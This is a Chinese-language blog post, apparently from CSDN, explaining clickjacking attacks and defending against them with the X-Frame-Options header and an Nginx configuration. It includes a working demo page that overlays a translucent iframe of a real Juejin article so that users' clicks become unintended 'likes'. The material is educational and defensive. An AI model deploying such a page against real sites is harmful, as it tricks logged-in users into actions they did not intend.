点击劫持攻击

已于 2024-02-13 12:13:20 修改
阅读量330 收藏 10
点赞数 4
文章标签: 程序人生
于 2024-02-12 18:48:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42693699/article/details/136102460
版权

文章目录

概述

点击劫持攻击(clickjacking)是一种欺诈性攻击方式,攻击者利用透明层让用户在不自知的情况下点击一个隐藏的页面元素。这种攻击可以导致用户无意中批准恶意活动,例如给攻击者的文章点赞或泄露敏感信息。

原理

点击劫持攻击听起来好像很厉害的黑客手段,但是其原理十分简单:

  1. 攻击者首先创建一个含有恶意代码的网页。
  2. 该网页中会包含一个透明的<iframe>元素,这个<iframe>中加载的是目标网站页面。
  3. 攻击者在自己的网页上添加诱饵,例如看起来正常的按钮或链接,它们在位置上与<iframe>中的元素重叠。
  4. 用户在点击诱饵,例如认为自己在进行正常操作时(如“提交”按钮),实际上点击的却是另一个透明<iframe>中的元素,导致攻击者可以捕获点击操作并触发不良动作。

如下图所示,攻击者可能会在灰色按钮上放置一个透明的<iframe>。当用户认为点击的是本网站的按钮时,其实触发了隐藏在<iframe>中的红色按钮。

攻击演示

为了展示点击劫持的效果,我们创建了一个恶意演示页面,并将 iframe 的透明度设置成 0.2。同时假设用户已经登录了掘金,并保持了登录状态,此时任何在恶意网站页面点击按钮操作,都会直接变成了掘金的点赞操作。

代码实现

<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Document</title>
  <style>
    html,
    body {
      height: 100%;
      padding: 0;
      margin: 0;
      overflow: hidden;
    }

    .iframe {
      width: 100%;
      height: 100%;
      border: 0;
      padding: 0;
      margin: 0;
      opacity: 0.2;
      z-index: 2;
    }

    .box {
      position: fixed;
      left: 168px;
      top: 140px;
      z-index: 0;
    }

    .box .button {
      width: 50px;
      height: 50px;
      border-radius: 50%;
      border: 2px solid #e2e2e2;
      background: #fff;
      color: #333;
      margin: 0;
      padding: 0;
    }
  </style>
</head>

<body>
  <div class="box">
    <button class="button">🐂</button>
  </div>
  <iframe src="https://juejin.cn/post/7332735079162593315" frameborder="0" class="iframe"></iframe>
</body>

</html>

防御攻击

要抵御点击劫持,最有效的方法是使用X-Frame-Options HTTP头。可以在服务器响应中设置,以阻止或允许页面嵌入<iframe>中。

注意: 它必须设置在 HTTP header 中才有效,在 HTML 设置 <meta> 标签是不生效的。

例如:<meta http-equiv="X-Frame-Options"...> 是没有作用的。

这个 header 包含 3 种值:

  • DENY: 始终禁止在 frame 中显示此页面,即便是同域名下的页面也不允许嵌套。
  • SAMEORIGIN: 只允许与页面同源的<iframe>中显示页面。
  • ALLOW-FROM url: 允许指定域的<iframe>中显示页面(已废弃,不推荐使用)

Nginx 配置示例

location / {
    # 设置 X-Frame-Options
    add_header X-Frame-Options SAMEORIGIN always; 
    # 其他配置...
}

参考资料

  1. OWASP. (n.d.). Clickjacking. https://www.owasp.org/index.php/Clickjacking
  2. Mozilla Developer Network. (n.d.). X-Frame-Options. https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
  3. Content Security Policy (CSP) - HTTP | MDN. https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP
子洋丶
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Nginx配置各种响应头防止XSS,点击劫持,frame恶意攻击
2301_81749759的博客
04-17 1006
一个网站接受一个HTTP的请求,然后跳转到HTTPS,用户可能在开始跳转前,通过没有加密的方式和服务器对话,比如,用户输入http://foo.com或者直接foo.com。这样存在中间人攻击潜在威胁,跳转过程可能被恶意网站利用来直接接触用户信息,而不是原来的加密信息。网站通过HTTP Strict Transport Security通知浏览器,这个网站禁止使用HTTP方式加载,浏览器应该自动把所有尝试使用HTTP的请求自动替换为HTTPS请求。
nginx配置解决点击劫持漏洞
听闻如故的博客
08-02 1890
nginx配置 点击劫持漏洞
Nginx配置各种响应头防止XSS,点击劫持,frame恶意攻击(1)
JavaEE菜鸟
07-14 822
Nginx配置各种响应头防止XSS,点击劫持,frame恶意攻击(1)_普通网友的博客-CSDN博客_nginx防xss攻击
如何配置Nginx以防止点击劫持
最新发布
长风破浪会有时的博客
04-02 326
首先,我们要明白什么是点击劫持。想象一下,你在一个网页上浏览,但是有一个坏人悄悄地把另一个网页放在了你正在浏览的网页上面,你点击的时候,实际上点击的是那个坏人的网页,而不是你以为的那个。通过这些配置,我们可以增加我们网站的安全性,防止被坏人利用点击劫持等手段进行攻击。为了防止这种情况,我们可以使用Nginx的一些配置来保护我们的网站。这个配置做了什么呢?
clickjackingpoc:点击劫持攻击的概念证明
05-24
点击劫持PoC 旨在使您的点击劫持事件变得更好,更轻松的工具。 更新 现在,在服务器日志中捕获信誉,并添加一条消息,要求提供赏金! 概述 一种基于Web的ClickJacking PoC工具。 跑步 确保您已安装php(默认安装在...
点击劫持漏洞案例ppt
01-02
#### 二、点击劫持攻击原理 点击劫持的核心在于利用HTML的`<iframe>`标签的透明属性,将恶意内容或链接放置在一个透明的框架之上。具体来说: 1. **不可见的`<iframe>`**: 攻击者利用`<iframe>`标签创建一个透明的...
iframeable:检查网站是否可以安全抵御 iframe点击劫持攻击
06-06
检查网站是否可以安全抵御 iframe点击劫持攻击 npm install -g iframeable iframeable // example iframeable http://github.com http://github.com denies being iframed, safe 此实用程序检查网站是否以 x-...
clickjack:一个检查子域是否有点击劫持攻击的简单工具
03-30
点击劫持测试仪 旨在检查网站是否容易受到点击劫持的python脚本,并将结果保存到Vulnerable.txt文件中。 用法 python3 clickjack.py 例子 输入 python3 clickjack.py sites.txt sites.txt www.bugcrowd.com ...
点击劫持页面.rar
05-28
点击劫持(Clickjacking)是一种恶意攻击手段,它利用透明或半透明的iframe层来欺骗用户点击原本不想点击的元素,从而达到攻击者的目的。这个"点击劫持页面.rar"文件提供了一个静态页面示例,用于演示这种攻击方式,...
Nginx常见漏洞处理
a630192144的博客
08-25 2961
为了方便的获得网站域名,开发人员一般依赖于HTTP Host header。例如,在php里用_SERVER[“HTTP_HOST”]。但是这个header是不可信赖的,如果应用程序没有对host header值进行处理,就有可能造成恶意代码的传入。
使用nginx处理的一些安全漏洞
fanggeyan的博客
07-19 7602
nginx.conflocation根据项目路径配置(实际就是把/替换为/;负载也会产生一条set-cookies信息,upstreamroute后加上SecureHttpOnly。控制referer来源,例如非192.168.41网段地址返回403错误。nginx.conflocation添加。nginx.conflocation设置。nginx.confserver下配置nginx.confhttp添加。nginxlocation配置。......
安全渗透测评之nginx配置解决方案
just_for_that_moment的博客
08-13 8201
host头攻击漏洞,点击劫持漏洞,X-Download-Options响应头缺失,X-Permitted-Cross-Domain-Policies响应头缺失,Referrer-Policy响应头缺失,Strict-Transport-Security响应头缺失,Content-Security-Policy响应头缺失,X-XSS-Protection响应头缺失,X-Content-Type-Options响应头缺失,会话cookie中缺少HttpOnly属性......
搭建Nginx+AdGuard Home | 防止DNS劫持 | 过滤广告
weixin_46202629的博客
03-09 1910
DNS运营商劫持我相信大家都不陌生了,利用AdGuard Home我们不仅可以自建加密DNS来防止运营商劫持,还可以用来过滤那些垃圾的广告。
Nginx】增加X-Frame-Options配置防止页面被嵌套(点击劫持
姜太小白的博客
05-11 3985
X-Frame-Options X-Frame-Options 有三个值: DENY表示该页面不允许在 frame 中展示,即便是在相同域名的页面中嵌套也不允许。 SAMEORIGIN表示该页面可以在相同域名页面的 frame 中展示。 ALLOW-FROM uri表示该页面可以在指定来源的 frame 中展示。 nginx配置X-Frame-Options头 配置文件一般在nginx/conf/nginx.conf中 add_header X-Frame-Options SAMEO...
nginx 点击劫持漏洞修复
wudinaniya的博客
01-10 2198
点击劫持漏洞修复方案: 在相应的 location 下添加 add_header X-Frame-Options SAMEORIGIN; 比如: location ^~ /company_manager/ { proxy_redirect off; proxy_set_header Host $ho...
Web服务器点击劫持(ClickJacking)的安全防范
个人技术博客
01-10 4572
一.介绍 ClickJacking即点击劫持,是一种将恶意代码经过处理使其变成透明、不可见的iframe,并将其覆盖在一个网页上,然后诱使用户在该网页上进行点击操作。通过改变iframe的在页面的位置,可以诱使用户正好点击我们设置好的透明iframe。 二.防御 1.Frame Busting 这种方式是通过写JavaScript来禁止iframe嵌套,因为可以轻易饶过,所以这里不介绍了。
nginx点击劫持漏洞修复
05-10
点击劫持是一种常见的 Web 安全漏洞,攻击者会将一个网站嵌入到另一个网站中,通过隐藏或者伪装的方式,欺骗用户去点击一个看似无害的链接,从而实现攻击者的恶意目的。nginx 本身并没有针对点击劫持的专门防御机制,但是我们可以通过一些方法来修复这个漏洞: 1. X-Frame-Options 防御点击劫持nginx配置文件中,可以通过设置 X-Frame-Options 来防御点击劫持。X-Frame-Options 是一个 HTTP 响应头,可以控制浏览器是否允许当前页面在 iframe 中展示。我们可以将其设置为 DENY,表示当前页面不能在 iframe 中展示,从而防止点击劫持攻击。示例配置如下: ``` add_header X-Frame-Options DENY; ``` 2. JavaScript 防御点击劫持 另外,我们还可以通过 JavaScript 来防御点击劫持。在页面中嵌入一个透明的 iframe,覆盖整个页面,当用户点击页面时,我们可以通过 JavaScript 判断点击事件的坐标是否在 iframe 内,如果是,则说明用户是在被劫持的页面中点击,我们可以将当前页面重定向到其他页面,从而避免被攻击。示例代码如下: ``` if (top != self) { top.location = self.location; } ``` 综上所述,我们可以通过 X-Frame-Options 和 JavaScript 来防御点击劫持漏洞。建议开发人员在开发过程中注意防范这种漏洞,以保障用户的安全。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值